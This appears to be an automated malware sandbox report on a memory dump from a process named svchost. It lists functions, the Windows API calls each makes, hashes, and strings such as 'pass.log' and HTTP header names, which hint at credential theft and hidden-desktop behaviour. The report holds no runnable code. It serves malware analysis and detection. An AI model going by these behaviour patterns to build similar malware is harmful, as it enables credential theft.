                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2886163261-0
                                                                                                                                                                                                            • Opcode ID: 2384ea9097a833b24d5b8108a4602d841b8cc338c89f456d74cb20a2ae7ef3d8
                                                                                                                                                                                                            • Instruction ID: 1d0cbe58a42e6112b8ddfa8b43695c8949b580d3d940c60503325a504768526f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2384ea9097a833b24d5b8108a4602d841b8cc338c89f456d74cb20a2ae7ef3d8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C531BFB1D10209AFDB40DFA8D885AEE7BF9FB4C310F11856AE919E7240E37499418F90
                                                                                                                                                                                                            Function 02C881F0 Relevance: 7.6, APIs: 5, Instructions: 89networkCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WSAGetLastError.WS2_32 ref: 02C88212
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C88243
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C8826F
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C88296
                                                                                                                                                                                                            • WSASetLastError.WS2_32(?), ref: 02C882C9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2886163261-0
                                                                                                                                                                                                            • Opcode ID: b819b516573bc4f912785a3247e2323c5e7f75cb7350b74a62e991f6c2d5373a
                                                                                                                                                                                                            • Instruction ID: 06586e1eaa10fa555cb0fbba212fe2088047078a4de0b2aeeb16aef29d23f064
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b819b516573bc4f912785a3247e2323c5e7f75cb7350b74a62e991f6c2d5373a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B31B8B5D0020CAFDB40DFA9D984AEEBBF5FB48304F11856AE914E7200E7749A40CFA1
                                                                                                                                                                                                            Function 02C936A0 Relevance: 7.6, APIs: 5, Instructions: 83registryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,02C822AB,00000000,00010108,?,00000000), ref: 02C936DF
                                                                                                                                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,80000001,00000000,00000000,00000000,00000000,00000000), ref: 02C93714
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02C9373E
                                                                                                                                                                                                            • RegDeleteKeyA.ADVAPI32(00000104,02C822AB), ref: 02C93756
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02C93762
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1912718029-0
                                                                                                                                                                                                            • Opcode ID: a22b862fa647e953029aae80ff2f96f161f4a9ea18174d0d1adeba07f20360f8
                                                                                                                                                                                                            • Instruction ID: 7fb592411c16b9625478df549eae7303d651cc39d5f0bd80f854c0c5892efd56
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a22b862fa647e953029aae80ff2f96f161f4a9ea18174d0d1adeba07f20360f8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A217476E40158ABDB21DA58DC48FEAB7ACEF85B10F1082D5FD44EB240D7B1AE548BD0
                                                                                                                                                                                                            Function 02C718C0 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: free$exitmallocmemcpy
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2377537114-0
                                                                                                                                                                                                            • Opcode ID: 8395759df2680560837155c9172614cfa67c7f3d6aaca21d69cc930b074bc6fd
                                                                                                                                                                                                            • Instruction ID: c08f22b8a041d20cf0afc80c082c48cf2a026f55f6d974c7d19bec6c713f0404
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8395759df2680560837155c9172614cfa67c7f3d6aaca21d69cc930b074bc6fd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E52190B1A0024AAFC714CF59E480B6ABBF5FF89304F14892CD98EC7300E771A661CB85
                                                                                                                                                                                                            Function 02C76189 Relevance: 7.6, APIs: 5, Instructions: 54memoryregistrystringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02C761EA
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02C761F1
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C76205
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02C7621E
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02C7622C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocCloseProcesslstrcpynmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3057210225-0
                                                                                                                                                                                                            • Opcode ID: 7bea04ede20f95714734c4022fbc73ad228c7d020ed77ea41a7ec876b47ed26c
                                                                                                                                                                                                            • Instruction ID: 4f0b01245737fa7da752c37295db53623940fa9153e1b90dd3e3a415debeda5d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7bea04ede20f95714734c4022fbc73ad228c7d020ed77ea41a7ec876b47ed26c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B114E31E815981BEB2B9774AC0DBDD779CEF5C704F1049E9EA49D7181D3B08A848B91
                                                                                                                                                                                                            Function 02C7C2B0 Relevance: 7.5, APIs: 5, Instructions: 41windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000), ref: 02C7C2C2
                                                                                                                                                                                                            • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02C7C2D9
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7C2EF
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C7C300
                                                                                                                                                                                                            • ExtractIconExA.SHELL32(?,00000000,?,00000000,00000001), ref: 02C7C317
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CloseExtractFileIconInformationModuleNameOpenProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1270303404-0
                                                                                                                                                                                                            • Opcode ID: ffefde84407ffa3bf936f714ec4d8c0ba9547b0d4e51b9316abd8307bece1bdc
                                                                                                                                                                                                            • Instruction ID: fa5839e23e620cd07b6d641c22ee302d381c8dd328d23801ca2f16bbda693b11
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ffefde84407ffa3bf936f714ec4d8c0ba9547b0d4e51b9316abd8307bece1bdc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB016D31A81658BBE721DB909D09FEABB7CAB05700F004685BE05A61C0DBB05B84CAA9
                                                                                                                                                                                                            Function 02C7D330 Relevance: 7.5, APIs: 5, Instructions: 37threadwindowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetThreadDesktop.USER32(?,?,00000000,75573080,?,02C782BC,?,00000006,00000000), ref: 02C7D33C
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000005), ref: 02C7D353
                                                                                                                                                                                                            • GetWindow.USER32(00000000), ref: 02C7D356
                                                                                                                                                                                                            • SendMessageA.USER32(00000000,00000006,?,02C782BC), ref: 02C7D36D
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000003), ref: 02C7D372
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$DesktopMessageSendThread
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3855296974-0
                                                                                                                                                                                                            • Opcode ID: 44198578d312c57fc9eb2ae3cdbaf9db90f23ab8b14fd1f3ee048e683ca965c8
                                                                                                                                                                                                            • Instruction ID: ac6f0cea62db6b4614dbee0b083b0783286056901d2d81e97fb8edad2a23fa5b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44198578d312c57fc9eb2ae3cdbaf9db90f23ab8b14fd1f3ee048e683ca965c8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0F08276A807187FD622DB55EC88FABB7ACEFC8B60F014605F90497340CA70ED118AB0
                                                                                                                                                                                                            Function 02C7C330 Relevance: 7.5, APIs: 5, Instructions: 34threadwindowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C7C33C
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C7C344
                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 02C7C350
                                                                                                                                                                                                            • SendMessageA.USER32(?,0000000D,?,?), ref: 02C7C361
                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 02C7C36D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Thread$AttachInput$CurrentMessageProcessSendWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2643679612-0
                                                                                                                                                                                                            • Opcode ID: dcb0cf830bf581fd3f1da6442162149c9e39e46a52e7eb12a6fd96775cb7a615
                                                                                                                                                                                                            • Instruction ID: 959e801d460fe618b7d861801d82dddbef8d6917c6acba2e40b479354d5c2cc3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dcb0cf830bf581fd3f1da6442162149c9e39e46a52e7eb12a6fd96775cb7a615
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65F03732680344BBD7115BA5EC8DF9BBF6CEB89761F004955FA05C7241C575DC118A70
                                                                                                                                                                                                            Function 02C7D2F0 Relevance: 7.5, APIs: 5, Instructions: 30threadwindowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C7D2FA
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C7D302
                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,02C78F74,?,?,?,?,02C78500,?,?), ref: 02C7D314
                                                                                                                                                                                                            • GetFocus.USER32 ref: 02C7D316
                                                                                                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,02C78F74,?,?,?,?,02C78500,?,?), ref: 02C7D323
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Thread$AttachInput$CurrentFocusProcessWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 968181190-0
                                                                                                                                                                                                            • Opcode ID: 147987f55d11e5604dcac225d12b0c0a976c67476d363a4c1d756db7917f9057
                                                                                                                                                                                                            • Instruction ID: 28bfdfac62720a456aaab90a63a047adc048fab3a29c7a037b15124af4f38da9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 147987f55d11e5604dcac225d12b0c0a976c67476d363a4c1d756db7917f9057
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05E0D832E80254BBD71257B6AC4DF9BBFACEB85761F100A95FA08C3241D575DC108AB0
                                                                                                                                                                                                            Function 02C873B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94stringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • strncpy.MSVCRT ref: 02C87461
                                                                                                                                                                                                              • Part of subcall function 02C86DE0: fseek.MSVCRT ref: 02C86E04
                                                                                                                                                                                                              • Part of subcall function 02C86DE0: fwrite.MSVCRT ref: 02C86E17
                                                                                                                                                                                                            • fseek.MSVCRT ref: 02C873EA
                                                                                                                                                                                                            • fread.MSVCRT ref: 02C87408
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: fseek$freadfwritestrncpy
                                                                                                                                                                                                            • String ID: 6d1da759
                                                                                                                                                                                                            • API String ID: 3817246059-2775040301
                                                                                                                                                                                                            • Opcode ID: a79c007313c34b4014313cf13caa20cf08d1be367463825b5006dbe7b7b136ba
                                                                                                                                                                                                            • Instruction ID: b8e7cecda93eb0dead1d0f925f56b964769aedb0d50f87b117b0d37f1e7c93e9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a79c007313c34b4014313cf13caa20cf08d1be367463825b5006dbe7b7b136ba
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0631A479A006418FC731DB28D484B22FBE5EFC5218F288A9DD48587752E335E8C9CFA1
                                                                                                                                                                                                            Function 02C7FE80 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64networkCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 02C7FEF3
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(?,Accept-Encoding:,00000012,A0000000), ref: 02C7FF02
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HeadersHttpRequest
                                                                                                                                                                                                            • String ID: ($Accept-Encoding:
                                                                                                                                                                                                            • API String ID: 1754618566-3981465706
                                                                                                                                                                                                            • Opcode ID: 92cc8b8512d096f058db4953c44d0e11fec2a3b11213a36eb77430e54254dbda
                                                                                                                                                                                                            • Instruction ID: 16e37e555267c3db740efa0454b5c3534b8a44a3dd256ca26184706643e49a1d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92cc8b8512d096f058db4953c44d0e11fec2a3b11213a36eb77430e54254dbda
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E11FCB1904345AFD750DF29D880B6BBBE8EB88654F004A2EF959D3241D730D904CBA2
                                                                                                                                                                                                            Function 02C8E1B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da208), ref: 02C8E1D7
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 02C8E240
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashExistsFile
                                                                                                                                                                                                            • String ID: 6d1da208$pass.log
                                                                                                                                                                                                            • API String ID: 1760361154-2140601709
                                                                                                                                                                                                            • Opcode ID: 0f27a7be032a33f1b8d52846a28b0450dff6c1478a75e100e02a8c87b137c549
                                                                                                                                                                                                            • Instruction ID: cde347b72a7618a63202c6e584855481142a0c40c80e2d4882351e2cace664e9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f27a7be032a33f1b8d52846a28b0450dff6c1478a75e100e02a8c87b137c549
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81112B715046994BC71A8B3CA8A86F7BFE49BC6304B24C6D5ECC987302EA308949C780
                                                                                                                                                                                                            Function 02CA2040 Relevance: 6.3, APIs: 5, Instructions: 54COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                            • Opcode ID: 375dcdb8f9d8c053798a386486593617f9a7364776c0a6d9b002b71cefc70fbb
                                                                                                                                                                                                            • Instruction ID: 32decc90f6327c08c48a5e4470352e3794319a5cb4ff2731381c70f0029124e5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 375dcdb8f9d8c053798a386486593617f9a7364776c0a6d9b002b71cefc70fbb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 110140B2A017925FD730DFA998A241BBAD57D8010C359893DD9DB87A04D332EA48D683
                                                                                                                                                                                                            Function 02C999D0 Relevance: 6.2, APIs: 4, Instructions: 248COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: mallocrealloc
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 948496778-0
                                                                                                                                                                                                            • Opcode ID: 617ddba0da475d12365199744d1ab891e5c667aa76b892f5b1f441804cd25320
                                                                                                                                                                                                            • Instruction ID: 6cde7e2f18e87d6f173b652e2c6a1794951f391c4f574f69ca29a89e7ee0b19a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 617ddba0da475d12365199744d1ab891e5c667aa76b892f5b1f441804cd25320
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA91D072E402559FCF14CF68CD89BAA3BA6FF84305F1445BDED099B342D674A911CBA0
                                                                                                                                                                                                            Function 02CA29B0 Relevance: 6.2, APIs: 4, Instructions: 248COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: mallocrealloc
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 948496778-0
                                                                                                                                                                                                            • Opcode ID: 3d40dffe10013fffd5ae44fd307643510c6ad2ac8a2ee88332ed811f9e5f3228
                                                                                                                                                                                                            • Instruction ID: 4f4f3afa43a001937bef1278ed365547be65adbf3fd40dbb2645ab194026c166
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d40dffe10013fffd5ae44fd307643510c6ad2ac8a2ee88332ed811f9e5f3228
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD91E371E402168FDB14CF64DC90BEA7BA5EF84309F1445B9ED0A9B345D634AD12CBE1
                                                                                                                                                                                                            Function 02C9E8C0 Relevance: 6.1, APIs: 4, Instructions: 146COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: closesocket
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2781271927-0
                                                                                                                                                                                                            • Opcode ID: c3624851fb6fa9ff8d6a0b37a51e9ad6e4dd1301b963aaafc1a1860065f70463
                                                                                                                                                                                                            • Instruction ID: 1f5c1bca1454f4497758cdfbd9b6462781be5221fc9b1ed8a8ef1214c8089ceb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3624851fb6fa9ff8d6a0b37a51e9ad6e4dd1301b963aaafc1a1860065f70463
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56510370140B019BCB65CF29C8887D6B7A6FBA5328F75CA1AC46B87294EF31E546CB50
                                                                                                                                                                                                            Function 02C9BBD0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 126COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
